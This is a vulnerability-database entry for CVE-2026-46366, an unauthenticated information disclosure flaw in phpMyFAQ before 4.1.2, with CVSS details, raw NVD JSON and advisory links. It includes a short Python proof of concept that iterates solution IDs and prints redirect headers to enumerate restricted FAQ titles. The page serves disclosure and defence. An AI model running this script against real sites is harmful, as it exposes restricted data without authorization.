Security Vulnerability Report
中文
CVE-2026-46366 CVSS 7.5 HIGH

CVE-2026-46366

Published: 2026-05-15 19:17:04
Last Modified: 2026-05-15 21:16:39
Source: [email protected]

Description

phpMyFAQ before 4.1.2 contains an information disclosure vulnerability in the getIdFromSolutionId() method that lacks permission filtering, allowing unauthenticated attackers to enumerate restricted FAQ entries and read their titles via the /solution_id_{id}.html endpoint. Attackers can sequentially iterate solution IDs to discover all FAQs including those restricted to specific users or groups, leaking sensitive metadata through redirect Location headers and page canonical links.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

phpMyFAQ < 4.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests target_url_base = "http://example.com/solution_id_{}.html" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36" } # Iterate through potential solution IDs for i in range(1, 100): url = target_url_base.format(i) try: response = requests.get(url, headers=headers, allow_redirects=False, timeout=5) # Check for Location header which might contain the title location = response.headers.get('Location') if location: print(f"[+] ID {i} Found: {location}") # If redirect is followed, check content for canonical link if response.status_code == 200: # Logic to parse HTML for <link rel="canonical" ...> pass except Exception as e: print(f"[-] Error connecting to {url}: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-46366", "sourceIdentifier": "[email protected]", "published": "2026-05-15T19:17:03.973", "lastModified": "2026-05-15T21:16:38.963", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "phpMyFAQ before 4.1.2 contains an information disclosure vulnerability in the getIdFromSolutionId() method that lacks permission filtering, allowing unauthenticated attackers to enumerate restricted FAQ entries and read their titles via the /solution_id_{id}.html endpoint. Attackers can sequentially iterate solution IDs to discover all FAQs including those restricted to specific users or groups, leaking sensitive metadata through redirect Location headers and page canonical links."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-99qv-g4x9-mgc3", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/phpmyfaq-unauthenticated-information-disclosure-via-getidfromsolutionid-permission-bypass", "source": "[email protected]"}, {"url": "https://github.com/thorsten/phpMyFAQ/security/advisories/GHSA-99qv-g4x9-mgc3", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.